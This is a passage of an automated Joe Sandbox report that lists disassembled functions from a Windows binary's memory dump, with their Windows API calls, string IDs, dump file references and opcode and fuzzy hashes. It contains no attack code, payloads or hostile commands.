                                                                                                                                  • Instruction Fuzzy Hash: C951B1316042449FD720EF20CE45B6ABBE4EF48764F54992AFA56FB2A0DB34EC01DB41
                                                                                                                                  Function 00EEEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEEC1E
                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EEEC94
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EEEC9E
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00EEED0B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                  • Opcode ID: 80dea85cc9b16e28c995cd00406d0201fcca6c66db6f5aafc5a17bf16e980918
                                                                                                                                  • Instruction ID: fe2d1d1bfa36593e0c218182da4ede0668ad721e8ec6c7b30ef0c6e7c9e13e50
                                                                                                                                  • Opcode Fuzzy Hash: 80dea85cc9b16e28c995cd00406d0201fcca6c66db6f5aafc5a17bf16e980918
                                                                                                                                  • Instruction Fuzzy Hash: 5231EE35A0028D9FD710EB69C849AAEB7F4AF08705F245026E916BB391DB709A42DB81
                                                                                                                                  Function 00EDC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EDC782
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00EDC78D
                                                                                                                                  • GetParent.USER32 ref: 00EDC7A9
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EDC7AC
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00EDC7B5
                                                                                                                                  • GetParent.USER32(?), ref: 00EDC7D1
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EDC7D4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                  • Opcode ID: 4db6eb42f1f7a856a94c9c26162732afc45a7dd9513d76b9066ef954489273ee
                                                                                                                                  • Instruction ID: ae58131a296a90c3d016949ded36801d8acea84794492bc39d7efe253395d0aa
                                                                                                                                  • Opcode Fuzzy Hash: 4db6eb42f1f7a856a94c9c26162732afc45a7dd9513d76b9066ef954489273ee
                                                                                                                                  • Instruction Fuzzy Hash: 4421C175900208AFCB05EB60CC85EFEBBA5EF4A310F201116F522A72D1DB789816EF60
                                                                                                                                  Function 00EDC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EDC869
                                                                                                                                  • GetDlgCtrlID.USER32 ref: 00EDC874
                                                                                                                                  • GetParent.USER32 ref: 00EDC890
                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EDC893
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00EDC89C
                                                                                                                                  • GetParent.USER32(?), ref: 00EDC8B8
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EDC8BB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                  • Opcode ID: 492969feb2ca9d1911df729d945cd1ef19c9289104b36e5decaf31e6503e50c2
                                                                                                                                  • Instruction ID: a3f4fe8b80dc70f04151affb4b9843f215abdf539c1ac700fbf9d6178c8a46cc
                                                                                                                                  • Opcode Fuzzy Hash: 492969feb2ca9d1911df729d945cd1ef19c9289104b36e5decaf31e6503e50c2
                                                                                                                                  • Instruction Fuzzy Hash: AB21A175900208ABDF04AB64CC85EFEBBA5EF46300F201116F512B7291DB79A91AEF60
                                                                                                                                  Function 00EDC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 00EDC8D9
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00EDC8EE
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EDC900
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EDC97B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  • Opcode ID: 05cc5f9e05b6b4c59428c1a93cf3583516715ab004e2f04cdd23da1bfcefe88b
                                                                                                                                  • Instruction ID: 224902b3c6c3766f5dbf89f1e5957d058df00e38d30d2ca83fbdf84fdffacfe8
                                                                                                                                  • Opcode Fuzzy Hash: 05cc5f9e05b6b4c59428c1a93cf3583516715ab004e2f04cdd23da1bfcefe88b
                                                                                                                                  • Instruction Fuzzy Hash: 7F112977648307B9FA142A30DC2ADA67BECDF473A4B301117FE00B91D2FB62A8439955
                                                                                                                                  Function 00EEB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00EEB137
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  • Opcode ID: 3d30b342d4f453c01c51b44304add62418b8f73c40289715562f7a64fda265b8
                                                                                                                                  • Instruction ID: f6090849c1c52bd99e678e2a44cbaeaada8a703b3d535fd992f7060ea8a8b947
                                                                                                                                  • Opcode Fuzzy Hash: 3d30b342d4f453c01c51b44304add62418b8f73c40289715562f7a64fda265b8
                                                                                                                                  • Instruction Fuzzy Hash: 0FC19874A0125ADFDB04DF99D481BAFB7F4EF08314F24506AE616FB291C770AA81CB90
                                                                                                                                  Function 00ECBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 00ECBA74
                                                                                                                                    • Part of subcall function 00EC8984: __mtinitlocknum.LIBCMT ref: 00EC8996
                                                                                                                                    • Part of subcall function 00EC8984: RtlEnterCriticalSection.NTDLL(00EC0127), ref: 00EC89AF
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00ECBA85
                                                                                                                                    • Part of subcall function 00EC7616: __calloc_impl.LIBCMT ref: 00EC7625
                                                                                                                                    • Part of subcall function 00EC7616: Sleep.KERNEL32(00000000,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC763C
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00ECBAA0
                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00F56990,00000064,00EC6B14,00F567D8,00000014), ref: 00ECBAF9
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00ECBB44
                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00ECBB8B
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00ECBBC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                  • Opcode ID: 47d6732a99478180622ef4a5e80a868f979a9a1a1fbb7070a54d372d14513f29
                                                                                                                                  • Instruction ID: 4ab14a8b651555bc9ed4ea796d610c5498c987294f5258666916602c41ee131f
                                                                                                                                  • Opcode Fuzzy Hash: 47d6732a99478180622ef4a5e80a868f979a9a1a1fbb7070a54d372d14513f29
                                                                                                                                  • Instruction Fuzzy Hash: A281AF709047498BCB24CF68C985EAABBF0AF45324F24526DD4A6BB3D1CB369803DB54
                                                                                                                                  Function 00EE7212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE7226
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE7233
                                                                                                                                    • Part of subcall function 00EC234B: __woutput_l.LIBCMT ref: 00EC23A4
                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EE725D
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00EE7269
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00EE7276
                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00EE7296
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00EE72A8
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00EE72B7
                                                                                                                                  • LockResource.KERNEL32(?), ref: 00EE72C3
                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EE7322
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1433390588-0
                                                                                                                                  • Opcode ID: 554a6331d815a77c31767ba515e717cb1c990ef13140747f3b2fa181533d4801
                                                                                                                                  • Instruction ID: 94bf9aafef04c4cf3d857a9b7945ff70605ececa0e1875fa17974794b7ee894b
                                                                                                                                  • Opcode Fuzzy Hash: 554a6331d815a77c31767ba515e717cb1c990ef13140747f3b2fa181533d4801
                                                                                                                                  • Instruction Fuzzy Hash: 7D31ADB190429EEBDB119F629D89AAB7BACFF08340B044425FD41E21A1E774D951EBA0
                                                                                                                                  Function 00EE4A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EE4A7D
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4A91
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00EE4A98
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AA7
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE4AB9
                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AD2
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4AE4
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B29
                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B3E
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00EE3AD7,?,00000001), ref: 00EE4B49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                  • Opcode ID: cbb8b61dda586d7bf4f24c04fd7b1c42a4b70604850bba209fe28261b5a1f604
                                                                                                                                  • Instruction ID: 0b41ecf7aa88f5e7831f5235a1f0c35dd7a0f7b0a161ff5785d36d50eb85f17a
                                                                                                                                  • Opcode Fuzzy Hash: cbb8b61dda586d7bf4f24c04fd7b1c42a4b70604850bba209fe28261b5a1f604
                                                                                                                                  • Instruction Fuzzy Hash: ED31A0B160024CBFEB209F56DC88B6AB7B9EB60315F144015F914E71D0E7F5EE459B60
                                                                                                                                  Function 00F1EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?), ref: 00F1EC32
                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F1EC49
                                                                                                                                  • GetWindowDC.USER32(?), ref: 00F1EC55
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00F1EC64
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00F1EC76
                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00F1EC94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                  • Opcode ID: 5106f684b36b70ced797851f81cb1326b9e4d978a451798d38297b1ced90b66e
                                                                                                                                  • Instruction ID: f9468508eeb27e56d14b86a943600c5512ce4f766ba28af6f6342c525dfcce95
                                                                                                                                  • Opcode Fuzzy Hash: 5106f684b36b70ced797851f81cb1326b9e4d978a451798d38297b1ced90b66e
                                                                                                                                  • Instruction Fuzzy Hash: 6C212C31500209EFEB21AB64EC49BEA7B75FB04325F144225FA26A51E1DB714952EF11
                                                                                                                                  Function 00EDD978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnumChildWindows.USER32(?,00EDDD46), ref: 00EDDC86
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                  • Opcode ID: 61d754abc0346edf04c90f4995f2b92cf180444575705f065c7cacd45df0eb07
                                                                                                                                  • Instruction ID: 47318f6dffe97ff487cd30ad932caa65e13dd68935b98f45a47daf3750e679c2
                                                                                                                                  • Opcode Fuzzy Hash: 61d754abc0346edf04c90f4995f2b92cf180444575705f065c7cacd45df0eb07
                                                                                                                                  • Instruction Fuzzy Hash: EB919130A04606AACB0CDF64CC81BEAFBB5FF05314F14A11AD95AB7251DB30795BDB90
                                                                                                                                  Function 00EA45A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EA45F0
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EA4695
                                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00EA47BD
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F15936
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00F1599D
                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F159CA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                  • String ID: close all
                                                                                                                                  • API String ID: 469580280-3243417748
                                                                                                                                  • Opcode ID: 81ef080b19ab1bfeb69c761da7a20c8f4ee92eeb0b5a33494415d4b5a1ddf1a0
                                                                                                                                  • Instruction ID: fe1af54b87bfe61d8934a6ca979399157b72f1d8ca080ce48482b293d0f93de9
                                                                                                                                  • Opcode Fuzzy Hash: 81ef080b19ab1bfeb69c761da7a20c8f4ee92eeb0b5a33494415d4b5a1ddf1a0
                                                                                                                                  • Instruction Fuzzy Hash: 21913B75600602CFC715EF24C895AA8F3E4FF4A710F5062A9E50ABB2A2DB70BD56DF10
                                                                                                                                  Function 00EBC24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00EBC2D2
                                                                                                                                    • Part of subcall function 00EBC697: GetClientRect.USER32(?,?), ref: 00EBC6C0
                                                                                                                                    • Part of subcall function 00EBC697: GetWindowRect.USER32(?,?), ref: 00EBC701
                                                                                                                                    • Part of subcall function 00EBC697: ScreenToClient.USER32(?,?), ref: 00EBC729
                                                                                                                                  • GetDC.USER32 ref: 00F1E006
